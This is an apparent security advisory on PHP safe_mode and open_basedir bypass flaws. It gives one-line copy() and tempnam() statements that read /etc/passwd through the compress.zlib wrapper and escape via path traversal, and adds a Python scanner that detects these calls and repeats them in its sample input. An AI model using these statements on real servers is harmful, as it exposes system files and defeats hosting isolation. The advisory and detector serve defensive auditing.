PHP Multiple Safe_Mode and Open_Basedir Restriction Bypass Vulnerabilities

Attackers may exploit these issues with standard PHP code.

An example statement exploiting the 'copy()' issue is available:

copy("compress.zlib:///etc/passwd", "/home/<username>/passwd.txt");



An example statement exploiting the 'tempnam()' issue is available:

tempnam("path_from_open_basedir", "../../../../../../../../Open_basedir_bypasswd");
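
For auditing hosted PHP code for the two call shapes shown above, the following static check is an added example, not part of the original advisory or of PHP itself. The names `scan`, `CALL`, `WRAPPER`, `TRAVERSAL` and `SAMPLE` are hypothetical. It inspects only string-literal arguments, and it generalizes beyond the `compress.zlib://` case by flagging any stream wrapper other than `file://` in the `copy()` source.

```python
import re

# copy()/tempnam() calls whose first two arguments are plain string literals.
# Calls built from variables are out of scope for this static check.
CALL = re.compile(
    r'''\b(copy|tempnam)\s*\(\s*(["'])((?:(?!\2).)*)\2\s*,\s*'''
    r'''(["'])((?:(?!\4).)*)\4\s*\)''',
    re.I,
)
# Assumption: any scheme other than file:// in a copy() source deserves review.
WRAPPER = re.compile(r'^(?!file://)[a-z][a-z0-9.+-]*://', re.I)
# A tempnam() prefix is meant to be a bare filename prefix, so directory
# separators or ".." in it are treated as suspicious.
TRAVERSAL = re.compile(r'[/\\]|\.\.')


def scan(source):
    """Return (line, function, reason) for each suspicious call in PHP source."""
    findings = []
    for m in CALL.finditer(source):
        func, arg1, arg2 = m.group(1).lower(), m.group(3), m.group(5)
        line = source.count("\n", 0, m.start()) + 1
        if func == "copy" and WRAPPER.match(arg1):
            findings.append((line, func, "stream wrapper in source: " + arg1))
        elif func == "tempnam" and TRAVERSAL.search(arg2):
            findings.append((line, func, "path component in prefix: " + arg2))
    return findings


# Constructed sample input: two calls shaped like the advisory's statements,
# two benign calls.
SAMPLE = '''<?php
copy("compress.zlib:///etc/passwd", "/home/user/passwd.txt");
copy("upload.tmp", "/home/user/upload.dat");
tempnam("/home/user/tmp", "../../../../../../../../Open_basedir_bypasswd");
tempnam("/home/user/tmp", "sess_");
'''

if __name__ == "__main__":
    for line, func, reason in scan(SAMPLE):
        print("line %d: %s(): %s" % (line, func, reason))
```
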


The following exploit is available:


 

Copyright 2010, SecurityFocus